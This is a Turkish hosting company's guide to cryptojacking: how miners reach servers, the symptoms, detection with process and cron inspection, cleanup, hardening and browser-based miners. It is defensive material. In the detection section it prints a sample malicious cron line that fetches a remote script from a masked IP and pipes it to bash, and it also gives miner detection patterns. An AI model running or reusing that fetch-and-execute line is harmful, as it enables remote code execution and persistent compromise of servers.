Güvenlik & SSL

    Cryptojacking (Gizli Kripto Madenciliği) Nedir?

    Cryptojacking'in sunucu kaynaklarını izinsiz madenciliğe nasıl sömürdüğünü, tespit ve temizliği anlatan rehber.

    12 dk okuma Güncellendi: 10 Temmuz 2026

    Bir sabah panelinizi açtığınızda sunucunuzun günlerdir kesintisiz %100 CPU'da çalıştığını, sitenizin kaplumbağa hızına düştüğünü ve ay sonu faturanızın beklediğinizin çok üzerinde geldiğini görürseniz, büyük ihtimalle birileri sizin adınıza kripto para kazıyordur. Buna cryptojacking deniyor: saldırgan sizin işlemci ve grafik kartı gücünüzü izniniz olmadan ele geçirip Monero gibi kripto paraları madencilikle üretir, ödülü kendi cüzdanına yollar, elektrik ve donanım aşınması faturasını ise size bırakır. Yani suç işleyen o, faturayı ödeyen sizsiniz.

    Fidye yazılımının aksine cryptojacking gürültü çıkarmaz; ekranınıza kilit ekranı basmaz, dosyalarınızı şifrelemez. Amacı fark edilmeden mümkün olduğunca uzun süre çalışmaktır, çünkü sömürülen her ekstra saat saldırgana daha fazla kazanç demektir. Bu sessizlik onu tehlikeli kılan şey; çoğu sunucu sahibi aylarca farkında olmadan başkasının madencilik operasyonunu finanse eder. Bu rehberde cryptojacking'in nasıl çalıştığını, sunucunuza hangi yollarla bulaştığını, hangi belirtilere dikkat etmeniz gerektiğini ve bir kıdemli sistem yöneticisinin gerçek dünyada uyguladığı adımlarla nasıl tespit edip temizleyeceğinizi anlatacağım.

    Cryptojacking Nasıl Çalışır?#

    Kripto madenciliği, blok zincirindeki işlemleri doğrulamak için yoğun matematiksel işlemler yapmayı gerektirir; bu işlemleri ilk çözen madenci ödül alır. İşlem gücü ne kadar fazlaysa ödül şansı o kadar artar. Meşru madenci elektrik ve donanım maliyetini kendi cebinden karşılar. Cryptojacking yapan saldırgan ise bu maliyeti tamamen ortadan kaldırır: binlerce hacklenmiş sunucuya küçük bir madenci yazılımı (coinminer) yerleştirir ve hepsini tek bir madencilik havuzuna (mining pool) bağlar. Sizin sunucunuz onun ücretsiz iş gücüdür.

    Kazılan para genellikle Monero (XMR) olur, çünkü Monero işlemleri gizlilik odaklıdır ve sıradan bir CPU ile bile kazılabilecek şekilde tasarlanmış RandomX algoritmasını kullanır. Bitcoin özel ASIC donanımı gerektirdiğinden bir sunucu CPU'su ile Bitcoin kazmak anlamsızdır, ama Monero tam olarak sunucu işlemcilerinin becerebileceği bir iştir. Bu yüzden ele geçirilen web sunucularında neredeyse her zaman xmrig gibi bir Monero madencisi görürsünüz.

    İki temel biçimi vardır. Birincisi sunucu/uç nokta tabanlı cryptojacking: saldırgan sunucunuza doğrudan kod çalıştırır, kalıcı bir süreç bırakır ve CPU'nuzu sürekli kullanır. İkincisi tarayıcı tabanlı cryptojacking: saldırgan web sitenize JavaScript enjekte eder ve sitenizi ziyaret eden kullanıcıların tarayıcısında madencilik yaptırır; bu durumda sömürülen sizin sunucunuz değil, ziyaretçilerinizin bilgisayarı olur ama itibar zararı sizindir. Bu rehberde ağırlıklı olarak sunucu tarafını, sonda da tarayıcı tarafını ele alacağız.

    Saldırganlar Sunucunuza Nasıl Girer?#

    Bir madencinin sunucunuzda çalışabilmesi için önce saldırganın kod çalıştırma yolu bulması gerekir. Pratikte gördüğümüz giriş kapıları neredeyse her zaman aynı birkaç zayıflıktan kaynaklanır. En yaygını yamalanmamış uygulama açıkları: güncel olmayan bir WordPress eklentisi, eski bir Laravel/Composer bağımlılığı, açık bırakılmış bir Redis veya Docker API portu, ya da uzaktan kod çalıştırmaya (RCE) izin veren bir CMS zafiyeti. Otomatik botlar internet genelini 7/24 tarar; savunmasız bir sürüm bulduğu anda saniyeler içinde madenciyi bırakır.

    İkinci büyük kapı zayıf veya sızmış kimlik bilgileri: brute-force ile kırılan SSH parolaları, sızıntı listelerinden denenen kullanıcı adları, panelde varsayılan bırakılmış şifreler. Bir başka klasik ise güvensiz bağımlılıklar ve tedarik zinciri: içine madenci gömülmüş sahte bir npm/PyPI paketi, zehirlenmiş bir Docker imajı veya "ücretsiz" bir nulled tema. Aşağıdaki tablo bu vektörleri ve pratik önlemlerini özetliyor.

    Giriş vektörüTipik örnekÖnlem
    Yamalanmamış uygulamaEski WordPress eklentisi, RCE'li CMSOtomatik güncelleme, WAF
    Zayıf SSH parolasıroot brute-forceAnahtar tabanlı SSH, Fail2ban
    Açık servis portuKimliksiz Redis, Docker APIGüvenlik duvarı, bind 127.0.0.1
    Kirli bağımlılıkSahte npm/PyPI paketi, nulled temaKilit dosyası, imza doğrulama
    Sızmış kimlikPanel/DB varsayılan şifresiŞifre rotasyonu, 2FA

    Sunucu güvenliğinin temel katmanlarını topluca gözden geçirmek isterseniz sunucu güvenliği temelleri rehberimiz bu vektörlerin her birini derinlemesine ele alıyor. WordPress kullanıyorsanız WordPress güvenliği rehberi de en sık sömürülen eklenti açıklarını kapatmanıza yardımcı olur.

    Belirtiler: Sunucunuz Kripto mu Kazıyor?#

    Cryptojacking sessiz çalışsa da tamamen görünmez değildir; işlemciyi sömürmek fiziksel izler bırakır. En belirgin işaret sürekli ve açıklanamayan yüksek CPU kullanımıdır. Sitenizde trafik olmadığı gecelerde bile CPU'nun aylarca %90-100 bandında sabit kalması neredeyse kesin bir uyarıdır. Meşru bir yük dalgalanır; madenci ise dümdüz tavan yapar, çünkü işi hiç bitmez.

    İkinci sinyal tanımsız veya garip isimli süreçlerdir. Süreç listesinde xmrig, kdevtmpfsi, kinsing, rastgele harflerden oluşan bir isim (.a3f9c1), ya da meşru gibi görünsün diye [kworker/0] gibi kernel süreci taklidi yapan bir kayıt görebilirsiniz. Bunlar genellikle bir madencilik havuzunun IP adresine dışa bağlantı (giden trafik) kurar. Diğer belirtiler şöyle sıralanır:

    • Sunucu ve sitelerin sürekli yavaşlaması, PHP-FPM zaman aşımları, veritabanı gecikmeleri
    • Fiziksel sunucularda ısınma ve fan sesinde artış; bulut/VDS'te CPU faturasının fırlaması
    • load average değerinin çekirdek sayısının kat kat üzerine çıkması
    • Beklenmedik cron girdileri veya /tmp, /dev/shm, /var/tmp altında çalıştırılabilir dosyalar
    • Antivirüs/güvenlik taramalarının aniden devre dışı kalması veya öldürülmesi
    • Sunucunuzun IP'sinin kara listeye girmesi ya da e-postalarınızın spam'e düşmesi

    Bu belirtilerden birkaçını aynı anda görüyorsanız, teşhisi doğrulamak için doğrudan sürecin içine bakma zamanı gelmiş demektir.

    Tespit: Süreç ve Sistem İncelemesi#

    İncelemeye her zaman kaynağı en çok tüketen süreçten başlarım. top veya htop ile CPU'yu kimin yediğini anında görürsünüz. Şüpheli süreci gördüğünüzde hemen öldürmeyin; önce onu tanıyın, çünkü nereden başlatıldığını ve neyi geri getireceğini bilmeden temizlik yaparsanız birkaç dakika sonra süreç geri gelir.

    # CPU'yu en çok tüketen süreçleri sıralı gör
    top -b -o %CPU -n 1 | head -n 20
    
    # Şüpheli süreci PID ile tanı: çalıştırılabilir dosyanın gerçek yolu
    ls -l /proc/<PID>/exe
    # Süreci başlatan tam komut satırı
    cat /proc/<PID>/cmdline | tr '\0' ' '; echo
    # Sürecin açtığı ağ bağlantıları (mining pool IP'sini yakalar)
    ss -tnp | grep <PID>
    

    /proc/<PID>/exe çıktısı çoğu zaman zararlının gerçek konumunu ele verir; silinmiş bir dosyaysa (deleted) etiketi görürsünüz. Ardından sistemin kalıcılık (persistence) noktalarını tararım. Madenciler yeniden başlatmadan sağ çıkmak için mutlaka bir yere tutunur; en sevdikleri yer cron'dur. Aşağıdaki komutlarla tüm cron ve zamanlanmış görev kaynaklarını tek tek gözden geçirin.

    # Tüm kullanıcıların crontab'ları
    for u in $(cut -f1 -d: /etc/passwd); do echo "== $u =="; crontab -l -u "$u" 2>/dev/null; done
    
    # Sistem geneli cron dizinleri
    cat /etc/crontab; ls -la /etc/cron.*/ /etc/cron.d/
    
    # systemd üzerinden gizlenmiş servis/timer var mı?
    systemctl list-timers --all
    systemctl list-units --type=service | grep -iE 'miner|xmr|kdev|kinsing'
    
    # Şüpheli konumlarda çalıştırılabilir dosya ara
    find /tmp /var/tmp /dev/shm -type f -perm -u+x -mmin -1440 2>/dev/null
    

    Tipik bir cryptojacking cron girdisi şöyle görünür; her dakika uzaktan bir betiği indirip çalıştırarak temizlense bile kendini geri yükler:

    * * * * * curl -fsSL http://185.x.x.x/init.sh | bash > /dev/null 2>&1
    

    Son olarak /etc/ld.so.preload, ~/.bashrc, ~/.ssh/authorized_keys ve /etc/rc.local dosyalarını kontrol edin; gelişmiş örnekler süreci gizlemek için preload rootkit'i yükler veya arka kapı olarak kendi SSH anahtarını ekler. Yetkisiz bir authorized_keys girdisi, temizlik sonrası saldırganın tekrar girmesinin en yaygın yoludur.

    Temizlik: Zararlıyı Kaldırma ve Kökü Kesme#

    Teşhis netleştiyse temizlik sırasını doğru kurmak kritiktir. Yanlış sırayla ilerlerseniz süreci öldürürsünüz ama cron onu 60 saniye içinde geri getirir; ya da dosyayı silersiniz ama bellekte çalışan süreç yeni bir kopya yazar. Doğru yaklaşım, önce yeniden doğuş mekanizmasını kesmek, sonra süreci öldürmek, en sonda dosyaları temizlemektir. Mümkünse bu işlemleri sunucuyu ağdan izole ederek yapın ki temizlik sırasında saldırgan yeni komut gönderemesin.

    # 1) Önce kalıcılığı kes: zararlı cron girdisini kaldır
    crontab -e            # kötü satırı sil
    rm -f /etc/cron.d/<supheli-dosya>
    
    # 2) Yeniden yazımı engelle: dosyayı değiştirilemez yap, sonra süreci öldür
    chattr +i /tmp/<miner>     # bazı zararlılar dosyayı geri yazamasın diye
    kill -9 <PID>
    # Aynı isimli tüm süreçleri topluca öldür
    pkill -9 -f xmrig; pkill -9 -f kdevtmpfsi
    
    # 3) Dosyaları temizle
    chattr -i /tmp/<miner> 2>/dev/null
    rm -f /tmp/<miner> /var/tmp/<miner> /dev/shm/<miner>
    
    # 4) Arka kapıyı kapat: yetkisiz SSH anahtarını ve preload'u kaldır
    grep -v 'saldirgan-anahtari' ~/.ssh/authorized_keys > /tmp/keys && mv /tmp/keys ~/.ssh/authorized_keys
    rm -f /etc/ld.so.preload
    

    Süreç öldürüldükten sonra top ile CPU'nun normale döndüğünü ve öldürülen sürecin geri gelmediğini birkaç dakika izleyin. Geri geliyorsa gözden kaçırdığınız ikinci bir kalıcılık noktası vardır — genellikle bir systemd servisi, bir .bashrc satırı ya da ikinci bir kullanıcının crontab'ı. Temizlik sonrası tüm parolaları ve SSH anahtarlarını yenileyin, çünkü saldırgan zaten kimlik bilgilerinize erişmiş olabilir. WordPress gibi bir uygulama ele geçirilmişse veritabanı ve wp-config.php içindeki tuzları da değiştirin.

    Şunu açıkça söyleyeyim: Ciddi şekilde ele geçirilmiş bir sunucuda en güvenli yol, temizlik değil sıfırdan yeniden kurulumdur. Bir rootkit yüklenmişse çalıştırdığınız ps, top, hatta ls komutlarının kendisi bile size yalan söylüyor olabilir. Temiz bir yedeğiniz varsa (ideali, bulaşma tarihinden öncesine ait bir otomatik yedek), sunucuyu baştan kurup uygulamayı güncel sürümüyle geri yüklemek, gizli bir arka kapıyla yaşamaktan çok daha sağlıklıdır. Bu süreçte veri kaybı yaşamamak için düzenli yedekleme politikasının neden hayati olduğunu bir kez daha görürsünüz.

    Kalıcı Koruma ve Yama Stratejisi#

    Temizlik bir kerelik iştir; asıl mesele sunucunun bir daha ele geçirilmemesidir. Cryptojacking'in ilk giriş vektörü neredeyse her zaman yamalanmamış bir açık veya zayıf bir kimlik olduğuna göre, savunma da tam bu noktalara odaklanmalı. Güncellemeyi otomatikleştirin: işletim sistemi paketleri ve uygulama bağımlılıklarını gecikmeden yamalayın.

    # Debian/Ubuntu için güvenlik güncellemelerini otomatikleştir
    apt-get install -y unattended-upgrades
    dpkg-reconfigure -plow unattended-upgrades
    

    SSH tarafında parola girişini tamamen kapatıp anahtar tabanlı kimlik doğrulamaya geçmek, brute-force vektörünü tek hamlede yok eder. /etc/ssh/sshd_config içinde şu satırları uygulayın:

    PermitRootLogin no
    PasswordAuthentication no
    PubkeyAuthentication yes
    

    Bunun üzerine tekrarlayan başarısız girişleri banlayan Fail2ban, yalnızca gerekli portları açan bir güvenlik duvarı ve uygulama katmanına gelen istismar denemelerini süzen bir WAF eklediğinizde savunma katmanları ciddi biçimde güçlenir. Redis, Docker API, Elasticsearch gibi servisleri asla 0.0.0.0 üzerinden internete açmayın; yalnızca 127.0.0.1 veya özel ağdan erişilebilir yapın. Kritik yük altındaki sunucuları hedefli DDoS ve otomatik istismar dalgalarına karşı DDoS koruma ile katmanlamak da isabetli olur.

    Bir diğer önemli önlem erken uyarıdır. Cryptojacking'in en pahalı yanı, aylarca fark edilmeden çalışmasıdır. CPU kullanımı, load average ve giden bağlantılar için eşik tabanlı bir izleme kurarsanız, madenci daha ilk gece devreye girdiğinde alarm alırsınız. Panelimizdeki uptime ve kaynak uyarıları tam olarak bu amaç için vardır; anormal bir CPU yükü tespit edildiğinde size haber verir. Yönetim yükünü tamamen bırakmak isteyen müşteriler için sunucu yönetimi hizmetimizde bu izleme, yama ve sertleştirme işlerini bizim ekibimiz üstlenir.

    Tarayıcı Tabanlı Cryptojacking (Web Sitesi Sahipleri İçin)#

    Sunucunuzun kaynakları sömürülmese bile, bir web sitesi sahibi olarak cryptojacking'in ikinci biçiminden etkilenebilirsiniz. Bu senaryoda saldırgan sitenize bir JavaScript madenci kodu enjekte eder; sitenizi ziyaret eden herkesin tarayıcısında, o kişinin bilgisayarının CPU'sunu kullanarak madencilik yapar. Ziyaretçileriniz sekmeniz açık kaldığı sürece fanları uğuldayan, ısınan bir bilgisayarla karşılaşır. Sonuç: kötü kullanıcı deneyimi, düşen itibar ve Google'ın kötü amaçlı içerik uyarısıyla arama sonuçlarından cezalanma riski.

    Enjeksiyon genellikle ele geçirilmiş bir CMS, kirli bir eklenti/tema ya da zehirlenmiş bir üçüncü parti script (reklam ağı, chat widget) üzerinden gelir. Tespiti için sayfanızın çıktısında tanımadığınız script etiketlerini ve dışa giden şüpheli bağlantıları arayın:

    # Sayfa kaynağında bilinen madenci imzalarını ara
    curl -s https://siteniz.com | grep -iE 'coinhive|cryptonight|coin-?imp|miner\.js|wasm'
    
    # WordPress dosya bütünlüğünü çekirdek ile karşılaştır (kurcalanmış dosyayı yakalar)
    wp core verify-checksums
    

    Şüpheli kodu bulduğunuzda ilgili script'i kaldırın, kaynağı olan eklenti/temayı temiz sürümüyle değiştirin ve tüm yönetici parolalarını yenileyin. Sürekli koruma için sayfanıza dış madencilik alan adlarına bağlantıyı engelleyen bir Content-Security-Policy başlığı ekleyebilirsiniz. WordPress kullanıyorsanız düzenli bütünlük kontrolü ve güncelleme için WordPress bakım hizmetimiz bu tür enjeksiyonları erkenden yakalar; genel güvenlik sertleştirmesi için de WordPress güvenliği rehberimizi izleyin.

    Sıkça Sorulan Sorular#

    Cryptojacking bilgisayarıma veya sunucuma zarar verir mi?#

    Evet, hem doğrudan hem dolaylı zarar verir. Doğrudan zarar, işlemcinin ve grafik kartının aylarca %100 yükte çalışmasıyla oluşan aşırı ısınma ve hızlanan donanım aşınmasıdır; fanlar ve termal bileşenler ömrünü çok daha çabuk tüketir. Dolaylı zarar ise sürekli yüksek kaynak tüketiminden doğan yüksek elektrik veya bulut CPU faturası, sitenizin yavaşlaması ve nihayetinde saldırganın açtığı arka kapının başka saldırılara zemin hazırlamasıdır.

    Cryptojacking ile fidye yazılımı arasındaki fark nedir?#

    Fidye yazılımı gürültücü ve yüzeydedir; dosyalarınızı şifreler, ekranınıza fidye notu basar ve varlığını size ilan ederek para talep eder. Cryptojacking ise tam tersine sessiz ve sabırlıdır; fark edilmemeyi ister, çünkü sömürülen her ekstra gün saldırgana daha fazla kazanç sağlar. Fidye yazılımı tek seferlik bir şok, cryptojacking ise aylara yayılan sinsi bir kaynak hırsızlığıdır. Bu yüzden cryptojacking çoğu zaman çok daha geç fark edilir.

    Sunucumda cryptojacking olduğundan nasıl kesin emin olurum?#

    Kesin doğrulama için sürecin kimliğine bakın. Sürekli %100 CPU tüketen süreci top ile bulun, ardından ls -l /proc/<PID>/exe ile çalıştırılabilir dosyanın gerçek yolunu ve ss -tnp | grep <PID> ile kurduğu ağ bağlantılarını inceleyin. Süreç xmrig gibi bir madenciye işaret ediyorsa, /tmp veya /dev/shm gibi olağandışı bir yerden çalışıyorsa ve bir madencilik havuzunun IP adresine dışa bağlantı kuruyorsa teşhis nettir. Kalıcılık için mutlaka crontab'ları da kontrol edin.

    Antivirüs cryptojacking'i durdurur mu?#

    Kısmen. Bilinen coinminer imzalarını taşıyan yaygın zararlıları çoğu güvenlik yazılımı yakalar, ancak saldırganlar sürekli isim değiştiren, belleğe yerleşen (fileless) ve meşru süreç taklidi yapan varyantlar kullandığı için antivirüs tek başına yeterli değildir. En etkili savunma katmanlıdır: güncel yama, güçlü kimlik doğrulama, gereksiz portların kapatılması ve anormal CPU yükünü erken yakalayan bir izleme sistemi bir arada çalışmalıdır.

    Sunucuyu temizledikten sonra yine geri geldi, ne yapmalıyım?#

    Zararlının geri gelmesi neredeyse her zaman gözden kaçan bir kalıcılık noktası anlamına gelir. Süreci öldürmeden önce cron, systemd timer/servis, .bashrc, /etc/rc.local ve authorized_keys dahil tüm yeniden doğuş kaynaklarını temizlediğinizden emin olun; sıralamayı önce kalıcılık, sonra süreç, en sonda dosya olacak şekilde uygulayın. Tekrarlarsa büyük ihtimalle bir rootkit veya arka kapı vardır ve en güvenli çözüm sunucuyu temiz bir yedekten sıfırdan yeniden kurmaktır.

    Barındırma paketimde cryptojacking'e karşı ne yapabilirim?#

    Paylaşımlı hosting kullanıyorsanız işletim sistemi seviyesindeki güvenliği büyük ölçüde sağlayıcınız yönetir; sizin göreviniz kendi uygulamanızı güncel ve temiz tutmaktır. Eklenti ve temalarınızı güncel tutun, nulled yazılım kullanmayın, güçlü ve benzersiz parolalar seçin ve WAF gibi ek koruma katmanlarını etkinleştirin. Kendi kaynaklarınızı yalıtılmış biçimde yönetmek istiyorsanız yönetimli bir VDS veya sanal sunucu çözümü, hem izolasyon hem de sertleştirme açısından size çok daha fazla kontrol sağlar.

    Kapanış#

    Cryptojacking, gürültü çıkarmadığı için tehlikeli; ama işleyişini bir kez kavradığınızda tespiti ve temizliği düpedüz mekanik bir işe dönüşür. Formül basittir: kaynağı en çok tüketen süreci tanıyın, kalıcılık noktalarını (özellikle cron'u) kesin, süreci öldürüp dosyaları temizleyin, arka kapıları kapatın ve en önemlisi ilk giriş açığını yamalayın. Asıl kazanç ise reaktif değil proaktif olmakta: güncel yama, anahtar tabanlı SSH, kapalı portlar, düzenli yedek ve erken uyaran bir izleme sistemi, madencinin daha ilk gece yakalanmasını sağlar.

    Clou.TR olarak sunucularımızı bu katmanlı yaklaşımla sertleştiriyoruz. Kaynaklarınızın izole ve izlenebilir olduğu sunucu ve hosting çözümlerimiz, otomatik yedekleme, WAF ve DDoS koruma seçenekleriyle birlikte gelir; yama, izleme ve olay müdahalesini tamamen bize bırakmak isterseniz sunucu yönetimi hizmetimiz devreye girer. Sunucunuzda anormal bir CPU yükü fark ettiyseniz beklemeyin — bugün bir kaynak incelemesi yapın; erken müdahale, hem faturanızı hem donanımınızı hem de itibarınızı korur.

    GüvenlikMalwareSunucu

    Uygulamaya geçmeye hazır mısınız?

    NVMe SSD, ücretsiz SSL ve %99.9 uptime garantisiyle Clou.TR hosting ve sunucu çözümleriyle projenizi hayata geçirin.